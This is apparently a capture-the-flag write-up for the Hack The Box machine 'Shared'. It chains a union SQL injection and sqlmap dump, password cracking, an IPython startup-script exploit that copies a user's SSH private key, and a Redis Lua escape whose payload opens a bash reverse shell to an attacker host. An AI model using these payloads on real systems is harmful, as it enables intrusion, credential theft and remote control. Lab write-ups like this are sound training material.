```bash
nmap -p- --min-rate 10000 10.10.11.172 -Pn
```

After finding the open ports, let's run a more detailed nmap scan against them.

```bash
nmap -A -sC -sV -p22,80,443 10.10.11.172 -Pn
```

From the nmap scan result, I need to add the shared.htb domain to the /etc/hosts file so that it resolves.

When I open the web application, I see the following webpage.

Let's start enumeration.

When I try the Proceed Checkout action, it redirects me to checkout.shared.htb, so let's add this host to /etc/hosts as well.

Now I can see the checkout webpage.

Let's look at this request in ZAP (zaproxy) to see the full request body and headers.

I started injecting payloads into the custom_cart dictionary, beginning with a single quote (') character.

Let's inject an SQL comment to check whether SQL injection is possible, so our payload becomes `'-- -`.

As you can see, it still prints the result, which means there is no input validation.

Let's try a union-based SQLi payload.

```
custom_cart={"test' UNION SELECT 111,version(),3333-- -":"1"}
```

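To make the flaw behind this union payload concrete, here is an added example (not code from the writeup or from the target application) showing a lookup that concatenates the custom_cart key into the query, beside the parameterised form that neutralises it. It assumes a hypothetical product table and uses an in-memory sqlite3 database in place of the target's MariaDB, so version() becomes sqlite_version().

```python
import sqlite3

# Constructed in-memory stand-in for the checkout database on the page.
# The real target ran MariaDB; sqlite3 is used only so the example runs offline.
CONN = sqlite3.connect(":memory:")
CONN.execute("CREATE TABLE product (code TEXT, name TEXT, price INTEGER)")
CONN.execute(
    "INSERT INTO product VALUES ('A1', 'Plain T-shirt', 20), ('B2', 'Hoodie', 45)"
)

# The writeup's union payload, adapted to sqlite (version() -> sqlite_version()).
UNION_PAYLOAD = "test' UNION SELECT 111,sqlite_version(),3333-- -"


def lookup_unsafe(code):
    """Mirrors the flaw on the page: the custom_cart key is pasted into the SQL text.

    A quote in the key closes the string literal, the UNION appends attacker-chosen
    rows, and the trailing comment discards the rest of the original statement.
    """
    sql = f"SELECT code, name, price FROM product WHERE code = '{code}'"
    return CONN.execute(sql).fetchall()


def lookup_safe(code):
    """Hardened form: the key travels as a bound parameter, never as SQL text,
    so the same payload is just a product code that does not exist."""
    return CONN.execute(
        "SELECT code, name, price FROM product WHERE code = ?", (code,)
    ).fetchall()


def cart_lookup(custom_cart, safe=True):
    """Resolve every key of a posted custom_cart dict with the chosen lookup."""
    lookup = lookup_safe if safe else lookup_unsafe
    return {code: lookup(code) for code in custom_cart}
```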

That's MariaDB. Let's automate the SQL injection with sqlmap by saving this request to a .req file.

```bash
sqlmap -r submit.req --level 5 --risk 3 --technique="U"
```

Let's list all databases with the --dbs option.

Let's list the tables of the checkout database by adding -D checkout --tables.

Let's dump all data from the user table in the checkout database with -D checkout -T user --dump.

```
james_mason: fc895d4eddc2fc12f995e18c865cf273 (hash)
```

Let's crack this hash with CrackStation.

```
james_mason: Soleil101
```

Let's connect to the machine over SSH with these credentials.

Let's enumerate the machine.

First of all, I want to upload pspy64 to the machine to see background jobs.

For this, I will start http.server as below.

```bash
python3 -m http.server --bind 10.10.14.18 8080
```

Then download the binary on the target with wget.

```bash
wget http://10.10.14.18:8080/pspy64
```

After running this binary, I see that the user with UID 1001 runs ipython in the background.

That's the dan_smith user.

Let's check the ipython version so we can search for publicly known exploits.

That's CVE-2022-21699.

Let's exploit this vulnerability. Affected IPython versions load startup scripts from a profile_default/startup directory found under the current working directory, which here is /opt/scripts_review. My malicious Python script steals the user's private key file by copying it into the /tmp directory.

```bash
mkdir -m 777 /opt/scripts_review/profile_default && mkdir -m 777 /opt/scripts_review/profile_default/startup && echo "import os; os.system('cat ~/.ssh/id_rsa > /tmp/dan.key')" > /opt/scripts_review/profile_default/startup/dr4ks.py
```

Now let's log in to the machine with dan_smith's private key.

```bash
chmod 600 id_rsa
ssh -i id_rsa dan_smith@shared.htb
```

user.txt


When I run the id command, I see that this user belongs to the sysadmin group.

Let's search for files and directories belonging to this group with find.

```bash
find / -group sysadmin 2>/dev/null
```

Let's download this file to our machine and analyze it.

I have downloaded it already.

When I run this binary on my box, it returns the error below.

To reach the target's Redis database, I will set up local port forwarding with ssh.

```bash
ssh -i id_rsa -L 6379:localhost:6379 dan_smith@shared.htb
```

Now I can run this file and get output.

As you can see, the output says that it is using a password. To obtain the clear-text password, I need to sniff the traffic, so I will use Wireshark.

Note: I need to capture on the loopback interface.

In the packet, you can see `auth F2WHqJUz2WEz=Gqq`, which means our password is "F2WHqJUz2WEz=Gqq".

Let's connect to Redis with this password.

It says that the Redis version is 6.0.15. I searched for publicly known exploits and found CVE-2022-0543, a Lua sandbox escape in Debian-packaged Redis where the Lua `package` library stays reachable from EVAL scripts.

root.txt


We can get a root shell with the payload below.

```
eval 'local os_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_os"); local os = os_l(); os.execute("bash -c \'bash -i >& /dev/tcp/10.10.14.18/1337 0>&1\'"); return 0' 0
```

Hola, I got a reverse shell on port 1337.